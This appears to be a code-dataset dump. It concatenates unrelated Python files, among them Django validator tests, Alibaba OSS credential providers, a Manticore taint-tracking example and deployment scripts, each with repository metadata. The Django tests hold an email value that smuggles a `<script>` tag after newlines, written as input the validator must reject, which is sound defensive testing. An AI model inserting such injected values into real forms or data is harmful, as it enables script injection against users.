f_slab, t_z = self.calc_fslab([self.a_slab]*n, self.a_sym,
h, k, l)
return f_slab, t_z
def calc_fb(self, n, h, k, l):
f_slab, t_z = self.calc_fslab([self.b_slab]*n, self.b_sym,
|
bcpki/bitcoin
|
src/bcert/examples/mk_foo1_static.py
|
Python
|
mit
| 2,934
| 0.023177
|
#!/usr/bin/python
import sys
sys.path.append('..')
from bcert_pb2 import *
import binascii
# fill out a minimal bitcoin cert
cert = BitcoinCert()
# first the data part (the part is later signed by the "higher level cert" or "the blockchain")
cert.data.version = '0.1'
cert.data.subjectname = 'Foo Inc.'
email = cert.data.contacts.add()
email.type = email.EMAIL
email.value = '[email protected]'
url = cert.data.contacts.add()
url.type = url.URL
url.value = 'http://www.fooinc.com'
paykey = cert.data.paymentkeys.add()
paykey.usage = paykey.PAYMENT
paykey.algorithm.type = paykey.algorithm.STATIC_BTCADDR # is default anyway
key = paykey.value.append("mrMyF68x19kAc2byGKqR9MLfdAe1t5MPzh")
#key = paykey.value.append("0211b60f23135a806aff2c8f0fbbe620c16ba05a9ca4772735c08a16407f185b34".decode('hex'))
# this is standard in bitcoin ripemd(sha256())
from bitcoin import hash_160
# add signature to cert
#sig = cert.signatures.add()
#sig.algorithm.type = sig.algorithm.BCPKI
#sig.algorithm.version = "0.3"
#sig.value = "foo1" # for signatures of type BCPKI the alias IS the value,
# other types place the signature of BitcoinCertDataToHash(certData) here,
# for BCPKI this hash appears in the blockchain instead
# see how the cert looks
print cert
# serialize it
def CertToAscii(cert):
ser = cert.SerializeToString()
crc = binascii.crc32(ser) & 0xffffff # keep only last 24 bit (should use CRC-24 like OpenPGP)
# OpenPGP uses initializations for its crc-24, see http://tools.ietf.org/html/rfc2440
asc = binascii.b2a_base64(cert.SerializeToString())[:-1] # without trailing newline
    asc += '=' # checksum is separated by =
asc += binascii.b2a_base64(('%06x'%crc).decode('hex'))
return asc
def CertToAsciiMsg(cert):
ver = cert.version
asc = CertToAscii(cert)
res = '-----BEGIN BTCPKI CERTIFICATE-----\n'
res += 'Version: '+cert.version+'\n\n'
res += '\n'.join(asc[i:i+72] for i in xrange(0, len(asc), 72))
res += '-----END BTCPKI CERTIFICATE-----\n'
return res
# TODO: AsciiToCert
from e import derivepubkey
#print "deriving filename from: "+normalized
#fname = id+'.bcrt'
fname = 'foo1_static.bcrt'
f=open(fname,'wb')
f.write(cert.SerializeToString())
f.close()
print "binary cert written to: "+fname
#fname = id+'.acrt'
#f=open(fname,'wb')
#f.write(CertToAscii(cert))
#f.close()
#print "ascii cert written to: "+fname
#fname = 'my.data'
#f=open(fname,'wb')
#f.write(cert.data.SerializeToString())
#f.close()
#print "binary data part written to: "+fname
# see the hash
print "hash of data part is: "+hash_160(cert.data.SerializeToString()).encode('hex')
print "hex binary cert: "+cert.SerializeToString().encode('hex')
#print CertToAscii(cert)
#print CertToAsciiMsg(cert)
# OLD
#from subprocess import Popen,PIPE,check_call,call
#p = Popen(['./bitcoind','-testnet','registeralias','foo3','0.5',hash],stdout=PIPE)
#result = p.stdout.read()
#print result
|
carlyeks/cassandra-dtest
|
cqlsh_tests/cqlsh_tools.py
|
Python
|
apache-2.0
| 2,124
| 0.001883
|
import csv
import random
import cassandra
from nose.tools import assert_items_equal
class DummyColorMap(object):
def __getitem__(self, *args):
return ''
def csv_rows(filename, delimiter=None):
"""
Given a filename, opens a csv file and yields it line by line.
"""
reader_opts = {}
if delimiter is not None:
reader_opts['delimiter'] = delimiter
with open(filename, 'rb') as csvfile:
for row in csv.reader(csvfile, **reader_opts):
yield row
def assert_csvs_items_equal(filename1, filename2):
with open(filename1, 'r') as x, open(filename2, 'r') as y:
assert_items_equal(list(x.readlines()), list(y.readlines()))
def random_list(gen=None, n=None):
if gen is None:
def gen():
return random.randint(-1000, 1000)
if n is None:
def length():
return random.randint(1, 5)
else:
def length():
return n
return [gen() for _ in range(length())]
def write_rows_to_csv(filename, data):
with open(filename, 'wb') as csvfile:
writer = csv.writer(csvfile)
for row in data:
writer.writerow(row)
csvfile.close
def monkeypatch_driver():
"""
Monkeypatches the `cassandra` driver module in the same way
    that cqlsh does. Returns a dictionary containing the original values of
the monkeypatched names.
"""
cache = {'deserialize': cassandra.cqltypes.BytesType.deserialize,
'support_empty_values': cassandra.cqltypes.CassandraType.support_empty_values}
cassandra.cqltypes.BytesType.deserialize = staticmethod(lambda byts, protocol_version: bytearray(byts))
cassandra.cqltypes.CassandraType.support_empty_values = True
return cache
def unmonkeypatch_driver(cache):
"""
Given a dictionary that was used to cache parts of `cassandra` for
monkeypatching, restore those values to the `cassandra` module.
"""
cassandra.cqltypes.BytesType.deserialize = staticmethod(cache['deserialize'])
cassandra.cqltypes.CassandraType.support_empty_values = cache['support_empty_values']
|
wintoncode/winton-kafka-streams
|
winton_kafka_streams/state/logging/store_change_logger.py
|
Python
|
apache-2.0
| 503
| 0.001988
|
class StoreChangeLogger:
def __init__(self, store_name, context) -> None:
        self.topic = f'{context.application_id}-{store_name}-changelog'
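        # e.g. an application_id of 'word-count' and a store named 'counts'
        # give the topic 'word-count-counts-changelog', mirroring the changelog
        # topic naming convention used by Kafka Streams.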
self.context = context
self.partition = context.task_id.partition
self.record_collector = context.state_record_collector
def log_change(self, key: bytes, value: bytes) -> None:
if self.record_collector:
            self.record_collector.send(self.topic, key, value, self.context.timestamp, partition=self.partition)
|
geobricks/geobricks_qgis_plugin_trmm
|
__init__.py
|
Python
|
gpl-2.0
| 1,510
| 0
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
GeobricksTRMM
A QGIS plugin
Download TRMM daily data.
-------------------
begin : 2015-10-06
copyright : (C) 2015 by Geobricks
email : [email protected]
git sha : $Format:%H$
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
This script initializes the plugin, making it known to QGIS.
"""
# noinspection PyPep8Naming
def classFactory(iface): # pylint: disable=invalid-name
"""Load GeobricksTRMM class from file GeobricksTRMM.
:param iface: A QGIS interface instance.
:type iface: QgsInterface
"""
#
from .geobricks_trmm_qgis import GeobricksTRMM
return GeobricksTRMM(iface)
|
wfxiang08/django178
|
tests/validators/tests.py
|
Python
|
bsd-3-clause
| 14,190
| 0.000918
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime, timedelta
import re
import types
from unittest import TestCase
from django.core.exceptions import ValidationError
from django.core.validators import (
BaseValidator, EmailValidator, MaxLengthValidator, MaxValueValidator,
MinLengthValidator, MinValueValidator, RegexValidator, URLValidator,
validate_comma_separated_integer_list, validate_email, validate_integer,
validate_ipv46_address, validate_ipv4_address, validate_ipv6_address,
validate_slug,
)
from django.test.utils import str_prefix
NOW = datetime.now()
EXTENDED_SCHEMES = ['http', 'https', 'ftp', 'ftps', 'git', 'file']
TEST_DATA = (
# (validator, value, expected),
(validate_integer, '42', None),
(validate_integer, '-42', None),
(validate_integer, -42, None),
(validate_integer, -42.5, None),
(validate_integer, None, ValidationError),
(validate_integer, 'a', ValidationError),
(validate_email, '[email protected]', None),
(validate_email, '[email protected]', None),
(validate_email, 'email@[127.0.0.1]', None),
(validate_email, 'email@[2001:dB8::1]', None),
(validate_email, 'email@[2001:dB8:0:0:0:0:0:1]', None),
(validate_email, 'email@[::fffF:127.0.0.1]', None),
(validate_email, '[email protected]', None),
(validate_email, '[email protected]', None),
(validate_email, '[email protected].उदाहरण.परीक्षा', None),
(validate_email, 'email@localhost', None),
(EmailValidator(whitelist=['localdomain']), 'email@localdomain', None),
(validate_email, '"test@test"@example.com', None),
(validate_email, None, ValidationError),
(validate_email, '', ValidationError),
(validate_email, 'abc', ValidationError),
(validate_email, 'abc@', ValidationError),
(validate_email, 'abc@bar', ValidationError),
(validate_email, 'a @x.cz', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, 'something@@somewhere.com', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, 'email@[127.0.0.256]', ValidationError),
(validate_email, 'email@[2001:db8::12345]', ValidationError),
(validate_email, 'email@[2001:db8:0:0:0:0:1]', ValidationError),
(validate_email, 'email@[::ffff:127.0.0.256]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]\n\n<script src="x.js">', ValidationError),
# Quoted-string format (CR not allowed)
(validate_email, '"\\\011"@here.com', None),
(validate_email, '"\\\012"@here.com', ValidationError),
(validate_email, '[email protected].', ValidationError),
(validate_slug, 'slug-ok', None),
(validate_slug, 'longer-slug-still-ok', None),
(validate_slug, '--------', None),
(validate_slug, 'nohyphensoranything', None),
(validate_slug, '', ValidationError),
(validate_slug, ' text ', ValidationError),
(validate_slug, ' ', ValidationError),
(validate_slug, '[email protected]', ValidationError),
(validate_slug, '你好', ValidationError),
(validate_slug, '\n', ValidationError),
(validate_ipv4_address, '1.1.1.1', None),
(validate_ipv4_address, '255.0.0.0', None),
(validate_ipv4_address, '0.0.0.0', None),
(validate_ipv4_address, '256.1.1.1', ValidationError),
(validate_ipv4_address, '25.1.1.', ValidationError),
(validate_ipv4_address, '25,1,1,1', ValidationError),
(validate_ipv4_address, '25.1 .1.1', ValidationError),
# validate_ipv6_address uses django.utils.ipv6, which
# is tested in much greater detail in its own testcase
(validate_ipv6_address, 'fe80::1', None),
(validate_ipv6_address, '::1', None),
(validate_ipv6_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv6_address, '1:2', ValidationError),
(validate_ipv6_address, '::zzz', ValidationError),
(validate_ipv6_address, '12345::', ValidationError),
(validate_ipv46_address, '1.1.1.1', None),
(validate_ipv46_address, '255.0.0.0', None),
(validate_ipv46_address, '0.0.0.0', None),
(validate_ipv46_address, 'fe80::1', None),
(validate_ipv46_address, '::1', None),
(validate_ipv46_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv46_address, '256.1.1.1', ValidationError),
(validate_ipv46_address, '25.1.1.', ValidationError),
(validate_ipv46_address, '25,1,1,1', ValidationError),
(validate_ipv46_address, '25.1 .1.1', ValidationError),
(validate_ipv46_address, '1:2', ValidationError),
(validate_ipv46_address, '::zzz', ValidationError),
(validate_ipv46_address, '12345::', ValidationError),
(validate_comma_separated_integer_list, '1', None),
(validate_comma_separated_integer_list, '1,2,3', None),
(validate_comma_separated_integer_list, '1,2,3,', None),
(validate_comma_separated_integer_list, '', ValidationError),
(validate_comma_separated_integer_list, 'a,b,c', ValidationError),
(validate_comma_separated_integer_list, '1, 2, 3', ValidationError),
(MaxValueValidator(10), 10, None),
(MaxValueValidator(10), -10, None),
(MaxValueValidator(10), 0, None),
(MaxValueValidator(NOW), NOW, None),
(MaxValueValidator(NOW), NOW - timedelta(days=1), None),
(MaxValueValidator(0), 1, ValidationError),
(MaxValueValidator(NOW), NOW + timedelta(days=1), ValidationError),
(MinValueValidator(-10), -10, None),
(MinValueValidator(-10), 10, None),
(MinValueValidator(-10), 0, None),
(MinValueValidator(NOW), NOW, None),
(MinValueValidator(NOW), NOW + timedelta(days=1), None),
(MinValueValidator(0), -1, ValidationError),
(MinValueValidator(NOW), NOW - timedelta(days=1), ValidationError),
(MaxLengthValidator(10), '', None),
(MaxLengthValidator(10), 10 * 'x', None),
(MaxLengthValidator(10), 15 * 'x', ValidationError),
(MinLengthValidator(10), 15 * 'x', None),
(MinLengthValidator(10), 10 * 'x', None),
(MinLengthValidator(10), '', ValidationError),
(URLValidator(), 'http://www.djangoproject.com/', None),
(URLValidator(), 'HTTP://WWW.DJANGOPROJECT.COM/', None),
(URLValidator(), 'http://localhost/', None),
(URLValidator(), 'http://example.com/', None),
(URLValidator(), 'http://www.example.com/', None),
(URLValidator(), 'http://www.example.com:8000/test', None),
(URLValidator(), 'http://valid-with-hyphens.com/', None),
(URLValidator(), 'http://subdomain.example.com/', None),
(URLValidator(), 'http://200.8.9.10/', None),
(URLValidator(), 'http://200.8.9.10:8000/test', None),
(URLValidator(), 'http://valid-----hyphens.com/', None),
(URLValidator(), 'http://example.com?something=value', None),
(URLValidator(), 'http://example.com/index.php?something=value&another=value2', None),
(URLValidator(), 'https://example.com/', None),
(URLValidator(), 'ftp://example.com/', None),
(URLValidator(), 'ftps://example.com/', None),
(URLValidator(EXTENDED_SCHEMES), 'file://localhost/path', None),
(URLValidator(EXTENDED_SCHEMES), 'git://example.com/', None),
(URLValidator(), 'foo', ValidationError),
(URLValidator(), 'http://', ValidationError),
(URLValidator(), 'http://example', ValidationError),
(URLValidator(), 'http://example.', ValidationError),
(URLValidator(), 'http://.com', ValidationError),
(URLValidator(), 'http://invalid-.com', ValidationError),
(URLValidator(), 'http://-invalid.com', ValidationError),
(URLValidator(), 'http://invalid.com-', ValidationError),
(URLValidator(), 'http://inv-.alid-.com', ValidationError),
(URLValidator(), 'http://inv-.-alid.com', ValidationError),
(URLValidator(), 'file://localhost/path', ValidationError),
(URLValidator(), 'git://example.com/', ValidationError),
(URLValidator(EXTENDED_SCHEMES), 'git:/
|
TwilioDevEd/api-snippets
|
notifications/register/send-notification/send-notification.7.x.py
|
Python
|
mit
| 528
| 0
|
#!/usr/bin/env python
# Install the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
# To set up environmental variables, see http://twil.io/secure
ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
client = Client(ACCOUNT_SID, AUTH_TOKEN)
notification = client.notify.services('ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.notifications.create(identity='00000001',
body='Hello Bob')
print(notification.sid)
|
sjperkins/tensorflow
|
tensorflow/tensorboard/backend/event_processing/plugin_asset_util.py
|
Python
|
apache-2.0
| 3,278
| 0.006406
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Load plugin assets from disk."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import tensorflow as tf
_PLUGINS_DIR = "plugins"
def _IsDirectory(parent, item):
"""Helper that returns if parent/item is a directory."""
return tf.gfile.IsDirectory(os.path.join(parent, item))
def PluginDirectory(logdir, plugin_name):
"""Returns the plugin directory for plugin_name."""
return os.path.join(logdir, _PLUGINS_DIR, plugin_name)
def ListPlugins(logdir):
"""List all the plugins that have registered assets in logdir.
If the plugins_dir does not exist, it returns an empty list. This maintains
compatibility with old directories that have no plugins written.
Args:
logdir: A directory that was created by a TensorFlow events writer.
Returns:
a list of plugin names, as strings
"""
plugins_dir = os.path.join(logdir, _PLUGINS_DIR)
if not tf.gfile.IsDirectory(plugins_dir):
return []
entries = tf.gfile.ListDirectory(plugins_dir)
return [x for x in entries if _IsDirectory(plugins_dir, x)]
def ListAssets(logdir, plugin_name):
"""List all the assets that are available for given plugin in a logdir.
Args:
logdir: A directory that was created by a TensorFlow summary.FileWriter.
plugin_name: A string name of a plugin to list assets for.
Returns:
A string list of available plugin assets. If the plugin subdirectory does
not exist (either because the logdir doesn't exist, or because the plugin
didn't register) an empty list is returned.
"""
plugin_dir = PluginDirectory(logdir, plugin_name)
if not tf.gfile.IsDirectory(plugin_dir):
return []
entries = tf.gfile.ListDirectory(plugin_dir)
return [x for x in entries if not _IsDirectory(plugin_dir, x)]
def RetrieveAsset(logdir, plugin_name, asset_name):
"""Retrieve a particular plugin asset from a logdir.
Args:
    logdir: A directory that was created by a TensorFlow summary.FileWriter.
plugin_name: The plugin we want an asset from.
asset_name: The name of the requested asset.
Returns:
string contents of the plugin asset.
Raises:
KeyError: if the asset does not exist.
"""
asset_path = os.path.join(PluginDirectory(logdir, plugin_name), asset_name)
try:
    with tf.gfile.Open(asset_path, "r") as f:
return f.read()
except tf.errors.NotFoundError:
raise KeyError("Asset path %s not found" % asset_path)
except tf.errors.OpError as e:
raise KeyError("Couldn't read asset path: %s, OpError %s" % (asset_path, e))
|
yuuagh/pywork
|
20171127/go.py
|
Python
|
gpl-3.0
| 4,158
| 0.015506
|
# -*- coding:utf-8 -*-
# @author yuding
# 2017-09-23
import re
import os
import shutil
import msvcrt
import traceback
def mkdir(path):
    # strip leading and trailing spaces
path = path.strip()
    # strip the trailing \ character
path = path.rstrip("\\")
isExists = os.path.exists(path)
if not isExists:
os.makedirs(path)
# get the target strings
def getTargetData(fname):
    # first read the raw file content
nc = open(fname + '.gb')
str = nc.read()
nc.close()
    # remove interfering information
str = re.sub(r'\.\.>', '..', str)
    # take the content between CDS and protein_id="xxxx"
pattern = r'CDS.*?protein_id=".*?".*?gene=".*?"'
p = re.compile(pattern, re.S|re.I)
result = p.findall(str)
    # get the target strings: "xxx..xxx" plus the content inside protein_id
newpattern = r'([\d]+?\.\.[\d]+,[\d]+?\.\.[\d]+,?[\d]+?\.\.[\d]+|[\d]+?\.\.[\d]+,?[\d]+?\.\.[\d]+|[\d]+?\.\.[\d]+).*protein_id="(.+?)".*gene="(.+?)"'
    p2 = re.compile(newpattern, re.S|re.I)
    # store the data in dictionaries
dic = {}
geneDic = {}
for unit in result:
result2 = p2.findall(unit)
value = re.split(',', result2[0][0])
key = result2[0][1]
dic[key] = value
geneDic[key] = result2[0][2]
return (dic, geneDic)
# get the replacement content
def getContent(fname):
tf = open(fname + '.fasta')
    first = tf.readline() # read the first line; this line is discarded
    content = tf.read() # start from the second line
    # remove the header and newline characters
content = re.sub(r'\n', '', content)
tf.close()
return content
def getAllData2(dirname, fname, name):
(dic, geneDic) = getTargetData(fname)
content = getContent(fname)
fl = open(dirname + '\\' + name + '.txt', 'wb')
length = len(content)
for unit in dic:
pt = ''
for k in dic[unit]:
pt = pt + k + ','
lh = len(pt)
if lh > 0:
pt = pt[0:lh - 1]
fl.write('name = ' + name + ', protein_id = ' + unit + ', ' + 'gene = ' + geneDic[unit] + ', position = ' + pt + ":\n")
for k in dic[unit]:
            # the string content starts at index 0
value = re.split(r'\.\.', k)
bg = int(value[0]) - 1
ed = int(value[1]) - 1
if bg > length - 1:
bg = length - 1
print 'begin beyond the max length'
if ed > length - 1:
print 'end beyond the max length' + ', length = ' + str(length) + ', ed = ' + str(ed)
ed = length - 1
final = content[bg : ed]
fl.write(final)
fl.write("\n")
fl.close()
def getPath():
    # get the directory from the current file path
dname = os.path.dirname(os.path.realpath(__file__))
dname = dname + '\\source'
filelist = os.listdir(dname)
names = []
for filename in filelist:
rl = re.split(r'\.', filename)
names.append(rl[0])
names = list(set(names))
return names
def getPackageData():
curfile = os.path.dirname(os.path.realpath(__file__))
names = getPath()
# make dir
mkdir(curfile + '\\result')
shutil.rmtree(curfile + '\\result')
mkdir(curfile + '\\result')
log = open(curfile + '\\log.txt', 'wb')
log.write('result path: ' + curfile + '\\result' + '\n')
for name in names:
try:
getAllData2(curfile + '\\result', curfile + '\\source\\' + name, name)
print('analysis id = ' + name + ',success')
log.write('analysis id = ' + name + ',success' + '\n')
except Exception, e:
print('analysis id = ' + name + ',fail')
log.write('analysis id = ' + name + ',fail')
log.write('message: ' + e.message)
log.close()
print('analysis finish')
print("Press 'd' to exit...")
while True:
if ord(msvcrt.getch()) in [68, 100]:
break
def main():
getPackageData()
if __name__ == '__main__':
main()
|
marios-zindilis/musicbrainz-django-models
|
musicbrainz_django_models/models/area_attribute.py
|
Python
|
gpl-2.0
| 1,946
| 0.004111
|
"""
.. module:: area_attribute
The **Area Attribute** Model.
PostgreSQL Definition
---------------------
The :code:`area_attribute` table is defined in the MusicBrainz Server as:
.. code-block:: sql
    CREATE TABLE area_attribute ( -- replicate (verbose)
id SERIAL, -- PK
area INTEGER NOT NULL, -- references area.id
        area_attribute_type INTEGER NOT NULL, -- references area_attribute_type.id
area_attribute_type_allowed_value INTEGER, -- references area_attribute_type_allowed_value.id
area_attribute_text TEXT
CHECK (
(area_attribute_type_allowed_value IS NULL AND area_attribute_text IS NOT NULL)
OR
(area_attribute_type_allowed_value IS NOT NULL AND area_attribute_text IS NULL)
)
);
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from ..signals import pre_save_model_attribute
@python_2_unicode_compatible
class area_attribute(models.Model):
"""
Not all parameters are listed here, only those that present some interest
in their Django implementation.
:param area: References :class:`area`
:param area_attribute_type: References :class:`area_attribute_type`
:param area_attribute_type_allowed_value: References :class:`area_attribute_type_allowed_value`.
"""
id = models.AutoField(primary_key=True)
area = models.ForeignKey('area')
area_attribute_type = models.ForeignKey('area_attribute_type')
area_attribute_type_allowed_value = models.ForeignKey('area_attribute_type_allowed_value', null=True)
area_attribute_text = models.TextField(null=True)
def __str__(self):
return 'Area Attribute'
class Meta:
db_table = 'area_attribute'
models.signals.pre_save.connect(pre_save_model_attribute, sender=area_attribute)
|
aliyun/aliyun-oss-python-sdk
|
oss2/credentials.py
|
Python
|
mit
| 4,941
| 0.003036
|
# -*- coding: utf-8 -*-
import time
import requests
import json
import logging
import threading
from .exceptions import ClientError
from .utils import to_unixtime
from .compat import to_unicode
logger = logging.getLogger(__name__)
class Credentials(object):
def __init__(self, access_key_id="", access_key_secret="", security_token=""):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self.security_token = security_token
def get_access_key_id(self):
return self.access_key_id
def get_access_key_secret(self):
return self.access_key_secret
def get_security_token(self):
return self.security_token
DEFAULT_ECS_SESSION_TOKEN_DURATION_SECONDS = 3600 * 6
DEFAULT_ECS_SESSION_EXPIRED_FACTOR = 0.85
class EcsRamRoleCredential(Credentials):
def __init__(self,
access_key_id,
access_key_secret,
security_token,
expiration,
duration,
expired_factor=None):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self.security_token = security_token
self.expiration = expiration
self.duration = duration
self.expired_factor = expired_factor or DEFAULT_ECS_SESSION_EXPIRED_FACTOR
def get_access_key_id(self):
return self.access_key_id
def get_access_key_secret(self):
return self.access_key_secret
def get_security_token(self):
return self.security_token
def will_soon_expire(self):
now = int(time.time())
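        # With the defaults (duration = 6 h, expired_factor = 0.85) this returns
        # True once less than 15% of the token lifetime (about 54 minutes) remains.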
return self.duration * (1.0 - self.expired_factor) > self.expiration - now
class CredentialsProvider(object):
def get_credentials(self):
return
class StaticCredentialsProvider(CredentialsProvider):
def __init__(self, access_key_id="", access_key_secret="", security_token=""):
self.credentials = Credentials(access_key_id, access_key_secret, security_token)
def get_credentials(self):
return self.credentials
class EcsRamRoleCredentialsProvider(CredentialsProvider):
def __init__(self, auth_host, max_retries=3, timeout=10):
self.fetcher = EcsRamRoleCredentialsFetcher(auth_host)
self.max_retries = max_retries
self.timeout = timeout
self.credentials = None
self.__lock = threading.Lock()
def get_credentials(self):
if self.credentials is None or self.credentials.will_soon_expire():
with self.__lock:
if self.credentials is None or self.credentials.will_soon_expire():
try:
self.credentials = self.fetcher.fetch(self.max_retries, self.timeout)
except Exception as e:
logger.error("Exception: {0}".format(e))
if self.credentials is None:
raise
return self.credentials
class EcsRamRoleCredentialsFetcher(object):
def __init__(self, auth_host):
self.auth_host = auth_host
def fetch(self, retry_times=3, timeout=10):
for i in range(0, retry_times):
try:
response = requests.get(self.auth_host, timeout=timeout)
if response.status_code != 200:
raise ClientError(
"Failed to fetch credentials url, http code:{0}, msg:{1}".form
|
at(response.status_code,
response.text))
dic = json.loads(to_unicode(response.content))
code = dic.get('Code')
access_key_id = dic.get('AccessKeyId')
access_key_secret = dic.get('AccessKeySecret')
security_token = dic.get('SecurityToken')
expiration_date = dic.get('Expiration')
last_updated_date = dic.get('LastUpdated')
if code != "Success":
raise ClientError("Get credentials from ECS metadata service error, code: {0}".format(code))
expiration_stamp = to_unixtime(expiration_date, "%Y-%m-%dT%H:%M:%SZ")
duration = DEFAULT_ECS_SESSION_TOKEN_DURATION_SECONDS
if last_updated_date is not None:
last_updated_stamp = to_unixtime(last_updated_date, "%Y-%m-%dT%H:%M:%SZ")
duration = expiration_stamp - last_updated_stamp
return EcsRamRoleCredential(access_key_id, access_key_secret, security_token, expiration_stamp,
duration, DEFAULT_ECS_SESSION_EXPIRED_FACTOR)
except Exception as e:
if i == retry_times - 1:
logger.error("Exception: {0}".format(e))
raise ClientError("Failed to get credentials from ECS metadata service. {0}".format(e))
|
bl8/bockbuild
|
packages/clutter.py
|
Python
|
mit
| 136
| 0.058824
|
GnuXzPackage ('clutter', '1.10.6',
    sources = [ 'http://source.clutter-project.org/sources/clutter/1.10/%{name}-%{version}.tar.xz' ],
)
|
montyly/manticore
|
examples/script/introduce_symbolic_bytes.py
|
Python
|
apache-2.0
| 2,875
| 0.001043
|
#!/usr/bin/env python
import sys
from manticore import issymbolic
from manticore.native import Manticore
"""
Replaces a variable that controls program flow with a tainted symbolic value. This
in turn explores all possible states under that variable's influence, and reports the
specific cmp/test instructions that can be influenced by tainted data.
Usage:
$ gcc -static -g src/state_explore.c -o state_explore # -static is optional
$ ADDRESS=0x$(objdump -S state_explore | grep -A 1 '((value & 0xff) != 0)' |
tail -n 1 | sed 's|^\s*||g' | cut -f1 -d:)
$ python ./introduce_symbolic_bytes.py state_explore $ADDRESS
Tainted Control Flow:
introducing symbolic value to 7ffffffffd44
400a0e: test eax, eax
400a19: cmp eax, 0x3f
400b17: test eax, eax
400b1e: cmp eax, 0x1000
400b63: test eax, eax
400a3e: cmp eax, 0x41
400a64: cmp eax, 0x42
400a8a: cmp eax, 0x43
400ab0: cmp eax, 0x44
400b6a: cmp eax, 0xf0000
Analysis finished. See ./mcore_cz3Jzp for results.
"""
if __name__ == "__main__":
if len(sys.argv) < 3:
sys.stderr.write(f"Usage: {sys.argv[0]} [binary] [address]\n")
sys.exit(2)
# Passing a parameter to state_explore binary disables reading the value
# from STDIN, and relies on us adding it manually
m = Manticore(sys.argv[1], ["anything"])
# Uncomment to see debug output
# m.verbosity = 2
# Set to the address of the instruction before the first conditional.
introduce_at = int(sys.argv[2], 0)
taint_id = "taint_A"
@m.hook(introduce_at)
def introduce_sym(state):
# RBP-0xC is the location of the value we're interested in:
#
# if ((value & 0xff) != 0) {
# 400a08: 8b 45 f4 mov -0xc(%rbp),%eax
# 400a0b: 0f b6 c0 movzbl %al,%eax
        # 400a0e: 85 c0 test %eax,%eax
#
print(f"introducing symbolic value to {state.cpu.RBP-0xc:x}")
val = state.new_symbolic_value(32, taint=(taint_id,))
state.cpu.write_int(state.cpu.RBP - 0xC, val, 32)
def has_tainted_operands(operands, taint_id):
# type: (list[manticore.core.cpu.abstractcpu.Operand], object) -> bool
for operand in operands:
op = operand.read()
if issymbolic(op) and taint_id in op.taint:
return True
return False
every_instruction = None
@m.hook(every_instruction)
def check_taint(state):
insn = state.cpu.instruction # type: capstone.CsInsn
if insn is None:
return
if insn.mnemonic in ("cmp", "test"):
if has_tainted_operands(insn.operands, taint_id):
print(f"{insn.address:x}: {insn.mnemonic} {insn.op_str}")
print("Tainted Control Flow:")
m.run()
print(f"Analysis finished. See {m.workspace} for results.")
|
jorgenschaefer/healthmonitor
|
fabfile.py
|
Python
|
agpl-3.0
| 1,805
| 0
|
# Fabric file for the health monitor.
#
# This should only be used for deployment tasks. make should be
# sufficient for development.
import os
from fabric.api import env, task, roles, lcd, local, run, put
BASE_DIR = os.path.dirname(__file__)
env.path = ":".join([
    '/home/forcer/bin/',
os.path.join(BASE_DIR, "node_modules/.bin/")
])
env.roledefs = {
'production': ['healthmonitor@loki']
}
@task
@roles('production')
def deploy():
run("test -d venv || pyvenv-3.4 venv")
run("test -f venv/lib/python3.4/site-packages/_healthmonitor.pth || "
"echo $HOME/lib > venv/l
|
ib/python3.4/site-packages/_healthmonitor.pth")
run("mkdir -p health.jorgenschaefer.de/static/")
run("mkdir -p lib/")
local("git archive -o deploy.tar.gz HEAD")
put("deploy.tar.gz")
local("rm deploy.tar.gz")
run("tar -C lib/ -xzf deploy.tar.gz")
run("rm deploy.tar.gz")
local("bower install --production")
local("tar -c bower_components/ "
"-zf bower_components.tar.gz")
put("bower_components.tar.gz")
local("rm bower_components.tar.gz")
run("tar -C lib -xzf bower_components.tar.gz")
run("rm bower_components.tar.gz")
local("make compress")
local("tar -C static -c CACHE -zf compressed_cache.tar.gz")
put("compressed_cache.tar.gz")
local("rm compressed_cache.tar.gz")
run("tar -C health.jorgenschaefer.de/static/ -xzf compressed_cache.tar.gz")
run("rm compressed_cache.tar.gz")
run("venv/bin/pip install -qr lib/requirements.txt")
run("venv/bin/django-admin migrate --noinput "
"--settings=healthmonitor.settings_production")
run("venv/bin/django-admin collectstatic --noinput "
"--settings=healthmonitor.settings_production")
run("sudo /usr/bin/supervisorctl restart healthmonitor")
|
fabian-paul/PyEMMA
|
pyemma/coordinates/clustering/regspace.py
|
Python
|
lgpl-3.0
| 6,283
| 0.002547
|
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 26.01.2015
@author: marscher
